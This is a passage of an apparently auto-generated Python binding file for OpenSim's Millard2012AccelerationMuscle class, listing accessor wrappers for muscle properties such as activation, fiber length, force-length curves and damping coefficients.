self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(Millard2012AccelerationMuscle self) -> std::string const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getConcreteClassName(self)
def copyProperty_default_activation(self, source):
"""
copyProperty_default_activation(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_default_activation(self, source)
def append_default_activation(self, value):
"""
append_default_activation(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_default_activation(self, value)
def constructProperty_default_activation(self, initValue):
"""
constructProperty_default_activation(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_default_activation(self, initValue)
def get_default_activation(self, *args):
"""
get_default_activation(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_default_activation(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_default_activation(self, *args)
def upd_default_activation(self, *args):
"""
upd_default_activation(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_default_activation(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_default_activation(self, *args)
def set_default_activation(self, *args):
"""
set_default_activation(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_default_activation(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_default_activation(self, *args)
def copyProperty_default_fiber_length(self, source):
"""
copyProperty_default_fiber_length(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_default_fiber_length(self, source)
def append_default_fiber_length(self, value):
"""
append_default_fiber_length(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_default_fiber_length(self, value)
def constructProperty_default_fiber_length(self, initValue):
"""
constructProperty_default_fiber_length(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_default_fiber_length(self, initValue)
def get_default_fiber_length(self, *args):
"""
get_default_fiber_length(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_default_fiber_length(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_default_fiber_length(self, *args)
def upd_default_fiber_length(self, *args):
"""
upd_default_fiber_length(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_default_fiber_length(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_default_fiber_length(self, *args)
def set_default_fiber_length(self, *args):
"""
set_default_fiber_length(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_default_fiber_length(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_default_fiber_length(self, *args)
def copyProperty_default_fiber_velocity(self, source):
"""
copyProperty_default_fiber_velocity(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_default_fiber_velocity(self, source)
def append_default_fiber_velocity(self, value):
"""
append_default_fiber_velocity(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_default_fiber_velocity(self, value)
def constructProperty_default_fiber_velocity(self, initValue):
"""
constructProperty_default_fiber_velocity(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_default_fiber_velocity(self, initValue)
def get_default_fiber_velocity(self, *args):
"""
get_default_fiber_velocity(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_default_fiber_velocity(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_default_fiber_velocity(self, *args)
def upd_default_fiber_velocity(self, *args):
"""
upd_default_fiber_velocity(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_default_fiber_velocity(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_default_fiber_velocity(self, *args)
def set_default_fiber_velocity(self, *args):
"""
set_default_fiber_velocity(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_default_fiber_velocity(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_default_fiber_velocity(self, *args)
def copyProperty_MuscleFirstOrderActivationDynamicModel(self, source):
"""
copyProperty_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_MuscleFirstOrderActivationDynamicModel(self, source)
def append_MuscleFirstOrderActivationDynamicModel(self, value):
"""
append_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, MuscleFirstOrderActivationDynamicModel value) -> int
Parameters
----------
value: OpenSim::MuscleFirstOrderActivationDynamicModel const &
"""
return _actuators.Millard2012AccelerationMuscle_append_MuscleFirstOrderActivationDynamicModel(self, value)
def constructProperty_MuscleFirstOrderActivationDynamicModel(self, initValue):
"""
constructProperty_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, MuscleFirstOrderActivationDynamicModel initValue)
Parameters
----------
initValue: OpenSim::MuscleFirstOrderActivationDynamicModel const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_MuscleFirstOrderActivationDynamicModel(self, initValue)
def get_MuscleFirstOrderActivationDynamicModel(self, *args):
"""
get_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, int i) -> MuscleFirstOrderActivationDynamicModel
Parameters
----------
i: int
get_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self) -> MuscleFirstOrderActivationDynamicModel
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_MuscleFirstOrderActivationDynamicModel(self, *args)
def upd_MuscleFirstOrderActivationDynamicModel(self, *args):
"""
upd_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, int i) -> MuscleFirstOrderActivationDynamicModel
Parameters
----------
i: int
upd_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self) -> MuscleFirstOrderActivationDynamicModel
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_MuscleFirstOrderActivationDynamicModel(self, *args)
def set_MuscleFirstOrderActivationDynamicModel(self, *args):
"""
set_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, int i, MuscleFirstOrderActivationDynamicModel value)
Parameters
----------
i: int
value: OpenSim::MuscleFirstOrderActivationDynamicModel const &
set_MuscleFirstOrderActivationDynamicModel(Millard2012AccelerationMuscle self, MuscleFirstOrderActivationDynamicModel value)
Parameters
----------
value: OpenSim::MuscleFirstOrderActivationDynamicModel const &
"""
return _actuators.Millard2012AccelerationMuscle_set_MuscleFirstOrderActivationDynamicModel(self, *args)
def copyProperty_ActiveForceLengthCurve(self, source):
"""
copyProperty_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_ActiveForceLengthCurve(self, source)
def append_ActiveForceLengthCurve(self, value):
"""
append_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, ActiveForceLengthCurve value) -> int
Parameters
----------
value: OpenSim::ActiveForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_append_ActiveForceLengthCurve(self, value)
def constructProperty_ActiveForceLengthCurve(self, initValue):
"""
constructProperty_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, ActiveForceLengthCurve initValue)
Parameters
----------
initValue: OpenSim::ActiveForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_ActiveForceLengthCurve(self, initValue)
def get_ActiveForceLengthCurve(self, *args):
"""
get_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> ActiveForceLengthCurve
Parameters
----------
i: int
get_ActiveForceLengthCurve(Millard2012AccelerationMuscle self) -> ActiveForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_ActiveForceLengthCurve(self, *args)
def upd_ActiveForceLengthCurve(self, *args):
"""
upd_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> ActiveForceLengthCurve
Parameters
----------
i: int
upd_ActiveForceLengthCurve(Millard2012AccelerationMuscle self) -> ActiveForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_ActiveForceLengthCurve(self, *args)
def set_ActiveForceLengthCurve(self, *args):
"""
set_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, int i, ActiveForceLengthCurve value)
Parameters
----------
i: int
value: OpenSim::ActiveForceLengthCurve const &
set_ActiveForceLengthCurve(Millard2012AccelerationMuscle self, ActiveForceLengthCurve value)
Parameters
----------
value: OpenSim::ActiveForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_set_ActiveForceLengthCurve(self, *args)
def copyProperty_ForceVelocityCurve(self, source):
"""
copyProperty_ForceVelocityCurve(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_ForceVelocityCurve(self, source)
def append_ForceVelocityCurve(self, value):
"""
append_ForceVelocityCurve(Millard2012AccelerationMuscle self, ForceVelocityCurve value) -> int
Parameters
----------
value: OpenSim::ForceVelocityCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_append_ForceVelocityCurve(self, value)
def constructProperty_ForceVelocityCurve(self, initValue):
"""
constructProperty_ForceVelocityCurve(Millard2012AccelerationMuscle self, ForceVelocityCurve initValue)
Parameters
----------
initValue: OpenSim::ForceVelocityCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_ForceVelocityCurve(self, initValue)
def get_ForceVelocityCurve(self, *args):
"""
get_ForceVelocityCurve(Millard2012AccelerationMuscle self, int i) -> ForceVelocityCurve
Parameters
----------
i: int
get_ForceVelocityCurve(Millard2012AccelerationMuscle self) -> ForceVelocityCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_ForceVelocityCurve(self, *args)
def upd_ForceVelocityCurve(self, *args):
"""
upd_ForceVelocityCurve(Millard2012AccelerationMuscle self, int i) -> ForceVelocityCurve
Parameters
----------
i: int
upd_ForceVelocityCurve(Millard2012AccelerationMuscle self) -> ForceVelocityCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_ForceVelocityCurve(self, *args)
def set_ForceVelocityCurve(self, *args):
"""
set_ForceVelocityCurve(Millard2012AccelerationMuscle self, int i, ForceVelocityCurve value)
Parameters
----------
i: int
value: OpenSim::ForceVelocityCurve const &
set_ForceVelocityCurve(Millard2012AccelerationMuscle self, ForceVelocityCurve value)
Parameters
----------
value: OpenSim::ForceVelocityCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_set_ForceVelocityCurve(self, *args)
def copyProperty_FiberForceLengthCurve(self, source):
"""
copyProperty_FiberForceLengthCurve(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_FiberForceLengthCurve(self, source)
def append_FiberForceLengthCurve(self, value):
"""
append_FiberForceLengthCurve(Millard2012AccelerationMuscle self, FiberForceLengthCurve value) -> int
Parameters
----------
value: OpenSim::FiberForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_append_FiberForceLengthCurve(self, value)
def constructProperty_FiberForceLengthCurve(self, initValue):
"""
constructProperty_FiberForceLengthCurve(Millard2012AccelerationMuscle self, FiberForceLengthCurve initValue)
Parameters
----------
initValue: OpenSim::FiberForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_FiberForceLengthCurve(self, initValue)
def get_FiberForceLengthCurve(self, *args):
"""
get_FiberForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> FiberForceLengthCurve
Parameters
----------
i: int
get_FiberForceLengthCurve(Millard2012AccelerationMuscle self) -> FiberForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_FiberForceLengthCurve(self, *args)
def upd_FiberForceLengthCurve(self, *args):
"""
upd_FiberForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> FiberForceLengthCurve
Parameters
----------
i: int
upd_FiberForceLengthCurve(Millard2012AccelerationMuscle self) -> FiberForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_FiberForceLengthCurve(self, *args)
def set_FiberForceLengthCurve(self, *args):
"""
set_FiberForceLengthCurve(Millard2012AccelerationMuscle self, int i, FiberForceLengthCurve value)
Parameters
----------
i: int
value: OpenSim::FiberForceLengthCurve const &
set_FiberForceLengthCurve(Millard2012AccelerationMuscle self, FiberForceLengthCurve value)
Parameters
----------
value: OpenSim::FiberForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_set_FiberForceLengthCurve(self, *args)
def copyProperty_TendonForceLengthCurve(self, source):
"""
copyProperty_TendonForceLengthCurve(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_TendonForceLengthCurve(self, source)
def append_TendonForceLengthCurve(self, value):
"""
append_TendonForceLengthCurve(Millard2012AccelerationMuscle self, TendonForceLengthCurve value) -> int
Parameters
----------
value: OpenSim::TendonForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_append_TendonForceLengthCurve(self, value)
def constructProperty_TendonForceLengthCurve(self, initValue):
"""
constructProperty_TendonForceLengthCurve(Millard2012AccelerationMuscle self, TendonForceLengthCurve initValue)
Parameters
----------
initValue: OpenSim::TendonForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_TendonForceLengthCurve(self, initValue)
def get_TendonForceLengthCurve(self, *args):
"""
get_TendonForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> TendonForceLengthCurve
Parameters
----------
i: int
get_TendonForceLengthCurve(Millard2012AccelerationMuscle self) -> TendonForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_TendonForceLengthCurve(self, *args)
def upd_TendonForceLengthCurve(self, *args):
"""
upd_TendonForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> TendonForceLengthCurve
Parameters
----------
i: int
upd_TendonForceLengthCurve(Millard2012AccelerationMuscle self) -> TendonForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_TendonForceLengthCurve(self, *args)
def set_TendonForceLengthCurve(self, *args):
"""
set_TendonForceLengthCurve(Millard2012AccelerationMuscle self, int i, TendonForceLengthCurve value)
Parameters
----------
i: int
value: OpenSim::TendonForceLengthCurve const &
set_TendonForceLengthCurve(Millard2012AccelerationMuscle self, TendonForceLengthCurve value)
Parameters
----------
value: OpenSim::TendonForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_set_TendonForceLengthCurve(self, *args)
def copyProperty_FiberCompressiveForceLengthCurve(self, source):
"""
copyProperty_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_FiberCompressiveForceLengthCurve(self, source)
def append_FiberCompressiveForceLengthCurve(self, value):
"""
append_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceLengthCurve value) -> int
Parameters
----------
value: OpenSim::FiberCompressiveForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_append_FiberCompressiveForceLengthCurve(self, value)
def constructProperty_FiberCompressiveForceLengthCurve(self, initValue):
"""
constructProperty_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceLengthCurve initValue)
Parameters
----------
initValue: OpenSim::FiberCompressiveForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_FiberCompressiveForceLengthCurve(self, initValue)
def get_FiberCompressiveForceLengthCurve(self, *args):
"""
get_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> FiberCompressiveForceLengthCurve
Parameters
----------
i: int
get_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self) -> FiberCompressiveForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_FiberCompressiveForceLengthCurve(self, *args)
def upd_FiberCompressiveForceLengthCurve(self, *args):
"""
upd_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, int i) -> FiberCompressiveForceLengthCurve
Parameters
----------
i: int
upd_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self) -> FiberCompressiveForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_FiberCompressiveForceLengthCurve(self, *args)
def set_FiberCompressiveForceLengthCurve(self, *args):
"""
set_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, int i, FiberCompressiveForceLengthCurve value)
Parameters
----------
i: int
value: OpenSim::FiberCompressiveForceLengthCurve const &
set_FiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceLengthCurve value)
Parameters
----------
value: OpenSim::FiberCompressiveForceLengthCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_set_FiberCompressiveForceLengthCurve(self, *args)
def copyProperty_FiberCompressiveForceCosPennationCurve(self, source):
"""
copyProperty_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_FiberCompressiveForceCosPennationCurve(self, source)
def append_FiberCompressiveForceCosPennationCurve(self, value):
"""
append_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceCosPennationCurve value) -> int
Parameters
----------
value: OpenSim::FiberCompressiveForceCosPennationCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_append_FiberCompressiveForceCosPennationCurve(self, value)
def constructProperty_FiberCompressiveForceCosPennationCurve(self, initValue):
"""
constructProperty_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceCosPennationCurve initValue)
Parameters
----------
initValue: OpenSim::FiberCompressiveForceCosPennationCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_FiberCompressiveForceCosPennationCurve(self, initValue)
def get_FiberCompressiveForceCosPennationCurve(self, *args):
"""
get_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, int i) -> FiberCompressiveForceCosPennationCurve
Parameters
----------
i: int
get_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self) -> FiberCompressiveForceCosPennationCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_FiberCompressiveForceCosPennationCurve(self, *args)
def upd_FiberCompressiveForceCosPennationCurve(self, *args):
"""
upd_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, int i) -> FiberCompressiveForceCosPennationCurve
Parameters
----------
i: int
upd_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self) -> FiberCompressiveForceCosPennationCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_FiberCompressiveForceCosPennationCurve(self, *args)
def set_FiberCompressiveForceCosPennationCurve(self, *args):
"""
set_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, int i, FiberCompressiveForceCosPennationCurve value)
Parameters
----------
i: int
value: OpenSim::FiberCompressiveForceCosPennationCurve const &
set_FiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceCosPennationCurve value)
Parameters
----------
value: OpenSim::FiberCompressiveForceCosPennationCurve const &
"""
return _actuators.Millard2012AccelerationMuscle_set_FiberCompressiveForceCosPennationCurve(self, *args)
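    # Note (hand-written comment, not SWIG output): the curve- and
    # model-valued properties above follow the same get_/upd_/set_ pattern
    # as the scalar ones, but hold OpenSim objects (curves, the activation
    # model). A property stores its own copy of the assigned object, so a
    # locally constructed curve can be discarded after set_X(curve) returns.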
def copyProperty_fiber_damping(self, source):
"""
copyProperty_fiber_damping(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_fiber_damping(self, source)
def append_fiber_damping(self, value):
"""
append_fiber_damping(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_fiber_damping(self, value)
def constructProperty_fiber_damping(self, initValue):
"""
constructProperty_fiber_damping(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_fiber_damping(self, initValue)
def get_fiber_damping(self, *args):
"""
get_fiber_damping(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_fiber_damping(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_fiber_damping(self, *args)
def upd_fiber_damping(self, *args):
"""
upd_fiber_damping(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_fiber_damping(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_fiber_damping(self, *args)
def set_fiber_damping(self, *args):
"""
set_fiber_damping(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_fiber_damping(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_fiber_damping(self, *args)
def copyProperty_fiber_force_length_damping(self, source):
"""
copyProperty_fiber_force_length_damping(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_fiber_force_length_damping(self, source)
def append_fiber_force_length_damping(self, value):
"""
append_fiber_force_length_damping(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_fiber_force_length_damping(self, value)
def constructProperty_fiber_force_length_damping(self, initValue):
"""
constructProperty_fiber_force_length_damping(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_fiber_force_length_damping(self, initValue)
def get_fiber_force_length_damping(self, *args):
"""
get_fiber_force_length_damping(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_fiber_force_length_damping(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_fiber_force_length_damping(self, *args)
def upd_fiber_force_length_damping(self, *args):
"""
upd_fiber_force_length_damping(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_fiber_force_length_damping(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_fiber_force_length_damping(self, *args)
def set_fiber_force_length_damping(self, *args):
"""
set_fiber_force_length_damping(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_fiber_force_length_damping(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_fiber_force_length_damping(self, *args)
def copyProperty_fiber_compressive_force_length_damping(self, source):
"""
copyProperty_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_fiber_compressive_force_length_damping(self, source)
def append_fiber_compressive_force_length_damping(self, value):
"""
append_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_fiber_compressive_force_length_damping(self, value)
def constructProperty_fiber_compressive_force_length_damping(self, initValue):
"""
constructProperty_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_fiber_compressive_force_length_damping(self, initValue)
def get_fiber_compressive_force_length_damping(self, *args):
"""
get_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_fiber_compressive_force_length_damping(self, *args)
def upd_fiber_compressive_force_length_damping(self, *args):
"""
upd_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_fiber_compressive_force_length_damping(self, *args)
def set_fiber_compressive_force_length_damping(self, *args):
"""
set_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_fiber_compressive_force_length_damping(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_fiber_compressive_force_length_damping(self, *args)
def copyProperty_fiber_compressive_force_cos_pennation_damping(self, source):
"""
copyProperty_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_fiber_compressive_force_cos_pennation_damping(self, source)
def append_fiber_compressive_force_cos_pennation_damping(self, value):
"""
append_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_fiber_compressive_force_cos_pennation_damping(self, value)
def constructProperty_fiber_compressive_force_cos_pennation_damping(self, initValue):
"""
constructProperty_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_fiber_compressive_force_cos_pennation_damping(self, initValue)
def get_fiber_compressive_force_cos_pennation_damping(self, *args):
"""
get_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_fiber_compressive_force_cos_pennation_damping(self, *args)
def upd_fiber_compressive_force_cos_pennation_damping(self, *args):
"""
upd_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
